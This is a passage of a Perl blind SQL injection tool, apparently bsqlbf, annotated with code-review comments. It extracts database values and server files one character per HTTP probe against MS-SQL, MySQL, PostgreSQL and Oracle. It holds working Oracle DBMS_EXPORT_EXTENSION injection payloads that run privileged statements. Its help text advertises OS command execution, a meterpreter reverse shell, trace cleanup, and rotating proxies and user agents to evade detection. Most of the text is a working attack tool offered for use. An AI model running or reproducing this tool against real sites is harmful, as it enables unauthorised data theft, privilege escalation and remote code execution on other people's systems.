#   2. probe those digits to learn the length itself ($fsize);
#   3. probe each character from position $start+1 onwards, appending it to
#      the global $solution and echoing it to the terminal.
# Each probe goes through getbyte() (defined elsewhere in this file), so a
# single character costs several HTTP requests.  The length()/substring()
# fragments built below are what the target's web and database logs see for
# every extracted byte.
#
# Globals read:    $database (0 MS-SQL, 1 MySQL, 2 PostgreSQL, 3 Oracle, the
#                  codes help() lists), $sql, $start.
# Globals written: $length ("<n>bytes", for bsqlintro()'s display),
#                  $solution (the accumulated value).
# Returns nothing callers use; the work is in the side effects.
#
# NOTE(review): every character loop runs `$i <= $fsize+1`, one position past
# the reported length — presumably that final probe yields an empty string,
# but confirm against getbyte().  The four branches are copy-paste of one
# routine and would collapse into a helper taking per-dialect templates.
sub sqlget                                  {

    ##--ms-sqlblock--##
if ($database==0 ) {

my ($fsize,$i,$s);
        # Step 1: digit count of len($sql).  `.=` on a fresh lexical is just
        # an assignment.
        $s = "SUBSTRING(cast( len(len ( ($sql) ) )as varchar(100)),1,1)";
    my $lng .= getbyte($s);
    # Step 2: the digits of the length, one probe each.
    for ($i=1;$i<=$lng;$i++) {
        $s = "SUBSTRING(cast(len(($sql))as varchar(100)),$i,1)";
        $fsize.=getbyte($s);
    }

    #print "FSIZE: $fsize\n";
    $length = $fsize. "bytes";
    &bsqlintro();

    # Step 3: one character per probe, resuming from -start when given.
    my $rsize = $start + 1;
    for ($i=$rsize;$i<=$fsize+1;$i++) {
        $s = "substring(cast(($sql)as varchar($fsize)),$i,1)";
        #print "S: $s\n";
        my $byte = getbyte($s);
        $solution .= $byte;
        print $byte;
    }

}

    ##--ms-sql block-finish--##
    ##---oracle block starts--##
    # Same three steps with Oracle's length()/substr()/varchar2.
if ($database==3)
{
    my ($fsize,$i,$s);
        $s = "SUBSTR(cast(length(length(($sql)))as varchar2(100)),1,1)";
    my $lng .= getbyte($s);
    for ($i=1;$i<=$lng;$i++) {
        $s = "SUBSTR(cast(length(($sql))as varchar2(100)),$i,1)";
        $fsize.=getbyte($s);
    }

    #print "Output Length: $fsize\n";
    $length = $fsize. "bytes";
    &bsqlintro();

    my $rsize = $start + 1;
    for ($i=$rsize;$i<=$fsize+1;$i++) {
        $s = "substr(cast(($sql)as varchar2($fsize)),$i,1)";
        #print "S: $s\n";
        my $byte = getbyte($s);
        $solution .= $byte;
        print $byte;
    }
}

    ##---oracle block finish--##
##--postgres block----##
    # Same three steps with PostgreSQL's length()/substr()/varchar.
if ($database==2) {
my ($fsize,$i,$s);
        $s = "SUBSTR(cast(length(length(($sql)))as varchar),1,1)";
    my $lng .= getbyte($s);
    for ($i=1;$i<=$lng;$i++) {
        $s = "SUBSTR(cast(length(($sql))as varchar),$i,1)";
        $fsize.=getbyte($s);
    }

    # Unlike the other branches this diagnostic print is live, not commented out.
    print "FSIZE: $fsize\n";
    $length = $fsize. "bytes";
    &bsqlintro();

    my $rsize = $start + 1;
    for ($i=$rsize;$i<=$fsize+1;$i++) {
        $s = "substr(cast(($sql)as varchar($fsize)),$i,1)";
        #print "S: $s\n";
        my $byte = getbyte($s);
        $solution .= $byte;
        print $byte;
    }
}

    ##--postgres block-finish--##
    ##-mysql block--##
    # Same three steps with MySQL's length()/mid(); no cast needed.
    if ($database==1) {
        my ($fsize,$i,$s);
        $s = "mid(length(length(($sql))),1,1)";
    my $lng .= getbyte($s);
    for ($i=1;$i<=$lng;$i++) {
        $s = "mid(length(($sql)),$i,1)";
        $fsize.=getbyte($s);
    }

    #print "FSIZE: $fsize\n";
    $length = $fsize. "bytes";
    &bsqlintro();

    my $rsize = $start + 1;
    for ($i=$rsize;$i<=$fsize+1;$i++) {
        $s = "mid(($sql),$i,1)";
        #print "S: $s\n";
        my $byte = getbyte($s);
        $solution .= $byte;
        print $byte;
    }
}

##-mysql-block-##
                                        }
  1636.  
  1637. #---------------end-------------------#
# Read a file through MySQL's load_file() (the -get option), one character
# per getbyte() round, and mirror it into a local file of the same basename
# in the current directory.
#
# $get is the operator-supplied remote path.  $lget becomes the last path
# component (after the last '/' or '\'); $fstr is the literal passed to
# load_file(): hex-encoded ("0x...") for '/'-style paths — that assignment is
# unconditional, the brace closes on the line before it — and a
# double-quoted string for '\'-style paths.
#
# Globals written: $sql (the current probe, finally reset to $get), $length
# ("<n>bytes" for bsqlintro()), $solution ("success").
#
# NOTE(review): the local copy is opened with an unchecked two-argument
# `open FILE, ">>$lget"` on a bareword handle, so a basename containing '|'
# or '>' is interpreted by open rather than used as a filename; prefer
# `open my $out, '>>', $lget or die "open $lget: $!"`.  If $get contains no
# separator at all, $lget stays undef and the open target is "".
# `my ($i, ...)` is declared twice in this sub (warns under `use warnings`),
# and $find, $b, $b_start, $b_end, $z and the inner $furl are never used.
sub fileget {
    my ($lget,$fstr);
    if ($get =~ m/.*\/(.*)/) {
        $lget = $1; }
        $fstr = "0x".unpack("H*","$get");
    if ($get =~ m/.*\\(.*)/) {
        $lget = $1;
        $fstr = "\"$get\"";
    }

    # A local file of that name already present (and no -start given) stops
    # the run and suggests resuming from its current size.
    my $rsize = $start + 1;
    if (-e "$lget" && ! $start) {
        $rsize = -s "$lget";
        print "Error: file ./$lget exists.\n";
        print "You can erase or resume it with: -start $rsize\n";
        exit 1
    }
    # Length discovery, same two-step scheme as sqlget(): digit count first,
    # then the digits of length(load_file(...)).
    my ($i,$fsize);
    $sql = "mid(length(length(load_file($fstr))),1,1)";
    my $lng .= getbyte($sql);
    for ($i=1;$i<=$lng;$i++) {
        my $find = 0;
        $sql = "mid(length(load_file($fstr)),$i,1)";
        $fsize.=getbyte($sql);
    }

    # Numeric comparison against a string literal: a zero or empty length
    # (nothing readable, or failed probes) aborts here.
    if ($fsize < "1") { print "Error: file not found, no permissions or ... who knows\n"; exit 1 }
    $length = $fsize. "bytes";
    # starting ..
    # Display-only value for bsqlintro(); the probes below use $fstr.
    $sql = "load_file($get)";

    &bsqlintro();
    # Get file
    #print "---> $lget";
    open FILE, ">>$lget";
    FILE->autoflush(1);
    print "\n--- BEGIN ---\n";
    my ($i,$b,$fcontent);
    $rsize = 1 if $rsize < 1;
    # One character per probe, echoed to the terminal and appended to the
    # local file.
    for ($i=$rsize;$i<=$fsize+1;$i++) {
        my $find = 0;
        my ($furl, $b_start, $b_end, $z);
        $sql = "mid(load_file($fstr),$i,1)";
        $fcontent=getbyte($sql);
        print $fcontent;
        print FILE "$fcontent";
    }
    print "\n--- END ---\n";
        close FILE;
    $solution = "success";
    $sql = "$get";
}
  1690.  
  1691.  
  1692.  
  1693. &result();
  1694.  
  1695.  
  1696.  
  1697. #########################################################################
  1698. sub httpintro {
  1699.     my ($strcookie, $strproxy, $struagent, $strtime, $i);
  1700.     print "--[ http options ]"; print "-"x62; print "\n";
  1701.     printf ("%12s %-8s %11s %-20s\n","schema:",$scheme,"host:",$authority);
  1702.     if ($ruagent) { $struagent="rnd.file:$ruagent" } else { $struagent = $uagent }
  1703.     printf ("%12s %-8s %11s %-20s\n","method:",uc($method),"useragent:",$struagent);
  1704.     printf ("%12s %-50s\n","path:", $path);
  1705.     foreach (keys %vars) {
  1706.         $i++;
  1707.         printf ("%12s %-15s = %-40s\n","arg[$i]:",$_,$vars{$_});
  1708.     }
  1709.     if (! $cookie) { $strcookie="(null)" } else { $strcookie = $cookie; }
  1710.     printf ("%12s %-50s\n","cookies:",$strcookie);
  1711.     if (! $proxy && !$rproxy) { $strproxy="(null)" } else { $strproxy = $proxy; }
  1712.     if ($rproxy) { $strproxy = "rnd.file:$rproxy" }
  1713.     printf ("%12s %-50s\n","proxy_host:",$strproxy);
  1714.     if (! $proxy_user) { $strproxy="(null)" } else { $strproxy = $proxy_user; }
  1715.     # timing
  1716.     if (! $time && !$rtime) { $strtime="0sec (default)" }
  1717.     if ( $time == 0) { $strtime="0 sec (default)" }
  1718.     if ( $time == 1) { $strtime="15 secs" }
  1719.     if ( $time == 2) { $strtime="5 mins" }
  1720.     if ($rtime) { $strtime = "rnd.time:$rtime" }
  1721.     printf ("%12s %-50s\n","time:",$strtime);
  1722.     printf("\n\nFinding Length of SQL Query....\n");
  1723. }
  1724.  
  1725. sub bsqlintro {
  1726.     my ($strstart, $strblind, $strlen, $strmatch, $strsql);
  1727.     print "\n--[ blind sql injection options ]"; print "-"x47; print "\n";
  1728.     if (! $start) { $strstart = "(null)"; } else { $strstart = $start; }
  1729.     if (! $blind) { $strblind = "(last) $lastvar"; } else { $strblind = $blind; }
  1730.     printf ("%12s %-15s %11s %-20s\n","blind:",$strblind,"start:",$strstart);
  1731.     printf ("%12s %-15s %11s %-20s\n","database:",$database,"type:",$type);
  1732.     if ($length eq $default_length) { $strlen = "$length (default)" } else { $strlen = $length; }
  1733.     if ($sql eq $default_sql) { $strsql = "$sql (default)"; } else { $strsql = $sql; }
  1734.     printf ("%12s %-15s %11s %-20s\n","length:",$strlen,"sql:",$strsql);
  1735.     if ($amatch eq 1) { $strmatch = "auto match:(!!THIS MAY BE WRONG!!)" } else { $strmatch = "match:"; }
  1736.     #printf ("%12s %-60s\n","$strmatch",$match);
  1737.     print " $strmatch $match\n";
  1738.     print "-"x80; print "\n\n";
  1739.     printf "\n Getting Data...\n";
  1740. }
  1741.  
  1742. #########################################################################
  1743.  
  1744. sub createlwp {
  1745.     my $proxyc;
  1746.     &getproxy;
  1747.     &getuagent if $ruagent;
  1748.     LWP::Debug::level('+') if $debug gt 3;
  1749.     $ua = new LWP::UserAgent(
  1750.         cookie_jar=> { file => "$$.cookie" });
  1751.     $ua->agent("$uagent");
  1752.     if (defined($proxy_user) && defined($proxy_pass)) {
  1753.         my ($pscheme, $pauthority, $ppath, $pquery, $pfragment) =
  1754.         $proxy =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
  1755.         $proxyc = $pscheme."://".$proxy_user.":".$proxy_pass."@".$pauthority;
  1756.     } else { $proxyc = $proxy; }
  1757.    
  1758.     $ua->proxy(['http'] => $proxyc) if $proxy;
  1759.     undef $proxy if $rproxy;
  1760.     undef $uagent if $ruagent;
  1761. }  
  1762.  
  1763. sub cookie {
  1764.     # Cookies check
  1765.     if ($cookie || $cookie =~ /; /) {
  1766.         foreach my $c (split /;/, $cookie) {
  1767.             my ($a,$b) = split /=/, $c;
  1768.             if ( ! $a || ! $b ) { die "Wrong cookie value. Use -h for help\n"; }
  1769.         }
  1770.     }
  1771. }
  1772.  
  1773. sub parseurl {
  1774.  ###############################################################################
  1775.  # Official Regexp to parse URI. Thank you somebody.
  1776.     ($scheme, $authority, $path, $query, $fragment) =
  1777.         $url =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
  1778.     # Parse args of URI into %vars and @varsb.
  1779.     foreach my $varval (split /&/, $query) {
  1780.         my ($var, $val) = split /=/, $varval;
  1781.         $vars{$var} = $val;
  1782.         push(@varsb, $var);
  1783.     }
  1784. }
  1785.  
  1786.  
  1787. #########################################################################
  1788. # Show options at running:
  1789. sub banner {
  1790.         print "\n // Blind SQL injection brute forcer \\\\ \n //originally written by...aramosf\@514.es  \\\\ \n";
  1791.     print " \n // mofified by sid-at-notsosecure.com \\\\ \n // http://www.notsosecure.com \\\\ \n";
  1792. }
  1793.  
  1794.  
  1795. #########################################################################
  1796. # Get differences in HTML
# Try to find a response line that distinguishes a "true" page from a
# "false" one, for use as the auto-detected -match string.
#
# Arguments: $_[0] the URL, $_[1] the quote/prefix to put in front of the
# trailing 1 or 0.  Two requests are made with " <quote>1" and " <quote>0"
# appended to the value of the injected parameter ($lastvar=$lastval): for
# GET by rewriting the URL, for POST by temporarily changing %vars and
# restoring it afterwards.
#
# Returns the string "no vulnerable" when both bodies are identical;
# otherwise the first line of the "1" body containing a word character that
# does not occur verbatim in the "0" body.  If every such line occurs in
# both, the last line of the "1" body is returned — so a page with dynamic
# content (timestamps, tokens) can yield a meaningless match, which is why
# the caller labels the result "auto match:(!!THIS MAY BE WRONG!!)".
#
# NOTE(review): $lastvar and $lastval are interpolated unescaped into s///,
# whereas the extraction loop wraps $match in \Q...\E; a parameter value with
# regex metacharacters (e.g. '.' or '+') changes what is replaced here.
# `my $a` shadows the sort package variable $a.
sub fmatch {
 my ($ok,$rtrn);
 my ($furla, $furlb,$quote) = ($_[0], $_[0],$_[1]);
 my ($html_a, $html_b);
 if (lc($method) eq "get") {
    $furla =~ s/($lastvar=$lastval)/$1 ${quote}1/;
    $furlb =~ s/($lastvar=$lastval)/$1 ${quote}0/;
    $html_a = fetch("$furla");
    $html_b = fetch("$furlb");
 } elsif (lc($method) eq "post") {
   # fetch() ignores its argument for POST and sends %vars instead.
   $vars{$lastvar} = $lastval . " ${quote}1";
   $html_a = fetch("$furla");
   $vars{$lastvar} = $lastval . " ${quote}0";
   $html_b = fetch("$furla");
   $vars{$lastvar} = $lastval;
 }

 #print "$html_a";
 #print "$html_b";

 if ($html_a eq $html_b) {
  $rtrn = "no vulnerable";
  return $rtrn;
 }

 # Line-by-line set difference; $rtrn always holds the last line examined,
 # so the loop's exit condition decides what is returned.
 my @h_a = split(/\n/,$html_a);
 my @h_b = split(/\n/,$html_b);
 foreach my $a (@h_a) {
    $ok = 0;
    if ($a =~ /\w/) {
        foreach (@h_b) {
            if ($a eq $_) {$ok = 1; }
        }
    } else { $ok = 1; }
   $rtrn = $a;
   last if $ok ne 1;
 }
 return $rtrn;
}
  1838.  
  1839.  
  1840. #########################################################################
  1841. # Fetch HTML from WWW
# Issue one HTTP request and return the response body as a string.
#
# Arguments: $_[0], the full URL, used for a GET.  For a POST the argument is
# ignored: the request goes to scheme://authority/path of the global $url
# with the global %vars as the form body (callers update %vars first).  The
# global $cookie, when set, is sent verbatim as a Cookie header on either
# method.  The global $ua (built by createlwp()) performs the request.
#
# Delay: -time 0/1/2 map to 0/15/300 seconds; -rtime "lo-hi" selects a
# random delay instead, and combining it with a non-zero -time exits.  The
# sleep happens before the method is validated, so a bad -method only dies
# after the wait.
#
# Returns $res->content() regardless of HTTP status: an error page or a
# proxy failure body is handed back just like a 200, so every caller works
# by comparing bodies, never status codes ($res->is_success is never
# consulted).
#
# NOTE(review): `/\d*-\d*/` matches any string containing '-', and
# `m/(\d+-\d+)/` has a single capture group, so $l receives the whole
# "lo-hi" token and $p is always undef; the arithmetic below therefore does
# not use the upper bound as written — confirm what -rtime really does.
# `srand` with no argument on every call is unnecessary on modern perls.
sub fetch {
    #print "fetch: $_[0]\n";
    my $secs;
    if ($time == 0) { $secs = 0 }
    elsif ($time == 1) { $secs = 15 }
    elsif ($time == 2) { $secs = 300 }
    if ($rtime =~ /\d*-\d*/ && $time == 0) {
        my ($l,$p) = $rtime =~ m/(\d+-\d+)/;
        srand; $secs = int(rand($p-$l+1))+$l;
    } elsif ($rtime =~ /\d*-\d*/ && $time != 0) {
        print "You can't run with -time and -rtime. See -help.\n";
        exit 1;
    }
    sleep $secs;

    my $res;
    if (lc($method) eq "get") {
        my $fetch = $_[0];
        if ($cookie) {
            $res = $ua->get("$fetch", Cookie => "$cookie");
        } elsif (!$cookie) {
            $res = $ua->get("$fetch");
        }
    } elsif (lc($method) eq "post") {
        # Same URI-splitting pattern as parseurl(); only scheme, authority
        # and path are used for the POST target.
        my($s, $a, $p, $q, $f) =
        $url=~m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
        my $fetch = "$s://$a".$p;
        if ($cookie) {
            $res = $ua->post("$fetch",\%vars, Cookie => "$cookie");
        } elsif (!$cookie) {
            $res = $ua->post("$fetch",\%vars);
        }
    } else {
        die "Wrong httpd method. Use -h for help\n";
    }
    my $html = $res->content();
    return $html;
}
  1880.  
  1881.  
  1882. sub getproxy {
  1883.     if ($rproxy && $proxy !~ /http/) {
  1884.         my @lproxy;
  1885.         open PROXY, $rproxy or die "Can't open file: $rproxy\n";
  1886.         while(<PROXY>) { push(@lproxy,$_) if ! /^#/ }
  1887.         close PROXY;
  1888.         srand; my $ind = rand @lproxy;
  1889.         $proxy = $lproxy[$ind];
  1890.     } elsif ($rproxy && $proxy =~ /http/)  {
  1891.         print "You can't run with -proxy and -rproxy. See -help.\n";
  1892.         exit 1;
  1893.     }
  1894. }
  1895.  
  1896. sub getuagent {
  1897.         my @uproxy;
  1898.         open UAGENT, $ruagent or die "Can't open file: $ruagent\n";
  1899.         while(<UAGENT>) { push(@uproxy,$_) if ! /^#/ }
  1900.         close UAGENT;
  1901.         srand; my $ind = rand @uproxy;
  1902.         $uagent = $uproxy[$ind];
  1903.         chop($uagent);
  1904. }
  1905.  
# Print the extracted value, send the Oracle clean-up requests that some
# injection types require, and print a troubleshooting checklist when almost
# nothing was extracted.
#
# Globals read: $sql, $solution, $end, $type, $url, $method, $cookie, $proxy,
# $match.  $end and get_or_post() are not declared in the visible part of
# the file.
#
# NOTE(review): in both clean-up branches `die` runs before the closing
# banner, the "cannot proceed" message and `exit 0`, so those lines are
# unreachable; print the banner before dying or drop the dead lines.  Also,
# `m/$match/i` interpolates $match unescaped, unlike the \Q...\E used in
# the extraction loop, so a match string with regex metacharacters is
# treated differently here.
sub result {
    print "\r results:\n" ." $sql = $solution\n" if length($solution) > 0;

# With $end set, send one request whose payload drops the helper function
# ("LinxReadFile") that an earlier step created — presumably the type-5
# file-reading path, which is not in view.  Success is judged solely by
# whether the response contains $match.
if ($end==1)
{
    ##### dropping function linxreadfile()
print "\ndropping function sys.LinxReadFile()\n";
my $drop_func=" and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' drop function LinxReadFile'''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
my $url_2=$url.$drop_func;
print "\nsending url..\n\n";
my $content = get_or_post($method,$url_2,$cookie,$proxy) ;
die "Couldn't get $url" unless defined $content;

  if(! ($content =~ m/$match/i))
      {
        print "-----------------------------------------------\n";
    die "ERROR occured !!!...I could not drop the function!!! ...\n";
        # Unreachable: die above never returns.
        print "-----------------------------------------------\n";
        print "cannot proceed";
        exit 0;
    }

  else
      {
              print "--------------------------------\n";
              print "No Errors Encountered...Function dropped....\n";
              print "--------------------------------\n";

        }

}

# Type 3 revokes the DBA role from PUBLIC after extraction (presumably
# granted earlier by the type-3 path, not in view).  If this request does
# not yield the $match response the grant is still in place on the target,
# which is why the die message tells the operator to report it to the
# client; on the target side it is a persistent privilege change to audit.
if ($type==3)
    {
############revoking dba privileges after data extraction############
        print "-----------------------------------------------\n";

        print "\nRevoking dba from public\n\n";

        print "-----------------------------------------------\n";

my $revokedbafrompub=" and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' revoke dba from public'''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
my $url_2=$url.$revokedbafrompub;
print "\nsending url..\n\n";
my $content = get_or_post($method,$url_2,$cookie,$proxy) ;
die "Couldn't get $url" unless defined $content;

  if(! ($content =~ m/$match/i))
      {
        print "-----------------------------------------------\n";
    die "ERROR occured !!!...I could not revoke the permissions, you should contact the client....\n";
        # Unreachable: die above never returns.
        print "-----------------------------------------------\n";
        print "cannot proceed";
        exit 0;
    }

  else
      {
              print "--------------------------------\n";
              print "No Errors Encountered...Permissions revoked....\n";
              print "--------------------------------\n";

        }

    }
############ Type 3 block ends here##################

    #print " total hits: $hits\n";
    # Fewer than two extracted characters almost always means the setup was
    # wrong; print the checklist.
    my $blah= length($solution);
    if ($blah<2)
    {print "\n !!!!!!Errrrrrrr.. Something is not quite right.. see below!!!!!\n";
     print "-------------------------------------------------------";
     print "\n1 In a string based injection, vulnerable parameter must end with single quote(')\n\t eg. blah.php?id=foo'";
     print "\n2 And don't forget to provide me a unique true response with -match";
     print "\n3 Also Check that the SQL Query you supplied returns only one row\n";
     print "\n4 BTW did you speify the right database (-database)\n";
     print "-------------------------------------------------------\n\n\n";
    }
}
  1995.  
# Print the banner and the usage text, then exit with status 1.
#
# $0 is the script name; $default_length, $default_method, $default_cmd and
# $default_useragent are the file-level defaults and are interpolated so the
# text stays in step with them.
#
# NOTE(review): the two usage lines read `- url` (stray space) while the
# examples use `-url`; the text also contains the typos
# "inforamtion_schema", "imformation_schema" and "speify".  These are
# runtime strings and are left untouched here.
sub help {
    &banner();
        print " ---------------------usage:-------------------------------------------\n";
    print"\nInteger based Injection-->$0 - url http://www.host.com/path/script.php?foo=1000 [options]\n ";
    print "\nString Based Injection-->$0 - url http://www.host.com/path/script.php?foo=bar' [options]\n  ";
    print "\n ------------------------------------options:--------------------------\n";
    print " -sql:\t\tvalid SQL syntax to get; version(), database(),\n";
    print "\t\t\(select  table_name from inforamtion_schema.tables limit 1 offset 0)\n";
    print " -get: \t\tIf MySQL user is root, supply word readable file name\n";
    print " -blind:\tparameter to inject sql. Default is last value of url\n";
    print " -match:\t*RECOMMENDED* string to match in valid query, Default is auto\n";
    print " -nomatch:\t string to match in invalid query (must only appear in false scenario)\n";
    print " -start:\tif you know the beginning of the string, use it.\n";
    print " -length:\tmaximum length of value. Default is $default_length.\n";
    print " -time:\t\ttimer options:\n";
    print " \t0:\tdont wait. Default option.\n";
    print " \t1:\twait 15 seconds\n";
    print " \t2:\twait 5 minutes\n\n";
    # The -type codes below are the values sqlget()/getbyte() and result()
    # branch on.
    print " -type:\t\tType of injection:\n";
    print " \t0:\tType 0 (default) is blind injection based on True and False responses\n";
    print " \t1:\tType 1 is blind injection based on True and Error responses\n";
    print " \t2:\tType 2 is injection in order by and group by \n";
    print " \t3:\tType 3 is extracting data with SYS privileges[ORACLE dbms_export_extension exploit]\n";
    print " \t4:\tType 4 is O.S code execution [ORACLE dbms_export_extension exploit]\n";
    print " \t5:\tType 5 is reading files [ORACLE dbms_export_extension exploit, based on java]\n\n";
    print " \t6:\tType 6 is O.S code execution [ORACLE DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit]\n";
    print " \t7:\tType 7 is O.S code execution [ORACLE SYS.KUPP\$PROC.CREATE_MASTER_PROCESS(), DBA Privs]\n";
    print " \t\t -cmd=revshell [Type 7 supports meterpreter payload execution, run generator.exe first]\n";
    print " \t\t -cmd=cleanup [run this after exiting your metasploit session, it will clean up the traces]\n";
    print " \t8:\tType 8 is O.S code execution [ORACLE DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions]\n";
    print " \t\t -cmd=revshell [Type 8 supports meterpreter payload execution, run generator.exe first]\n";
    print " -file:\tFile to read [default C:\\boot.ini] \n\n";
    print " -stype:\tHow you want to execute command:\n";
    print " \t0:\tSType 0 (default) is based on java..will NOT work against XE\n";
    print " \t1:\tSType 1 is against oracle 9 with plsql_native_make_utility\n";
    print " \t2:\tSType 2 is against oracle 10 with dbms_scheduler \n";
    # The -database codes are the values sqlget() branches on.
    print " -database:\tBackend database:\n";
    print " \t0:\tMS-SQL (Default)\n";
    print " \t1:\tMYSQL\n";
    print " \t2:\tPOSTGRES\n";
    print " \t3:\tORACLE\n";
    print " -rtime:\twait random seconds, for example: \"10-20\".\n";
    print " -method:\thttp method to use; get or post. Default is $default_method.\n";
    print " -cmd:\t\tcommand to execute(type 4 only). Default is \"$default_cmd.\"\n";
    print " -uagent:\thttp UserAgent header to use. Default is $default_useragent\n";
    print " -ruagent:\tfile with random http UserAgent header to use.\n";
    print " -cookie:\thttp cookie header to use\n";
    print " -rproxy:\tuse random http proxy from file list.\n";
    print " -proxy:\tuse proxy http. Syntax: -proxy=http://proxy:port/\n";
    print " -proxy_user:\tproxy http user\n";
    print " -proxy_pass:\tproxy http password\n";
    print "\n---------------------------- examples:-------------------------------\n";
    print "bash# $0 -url http://www.somehost.com/blah.php?u=5 -blind u -sql \"select table_name from imformation_schema.tables limit 1 offset 0\" -database 1 -type 1\n\n";
    print "bash# $0 -url http://www.buggy.com/bug.php?r=514&p=foo' -method post -get \"/etc/passwd\" -match \"foo\"\n";
    # Non-zero exit: help is shown on usage errors as well as on -h.
    exit(1);
}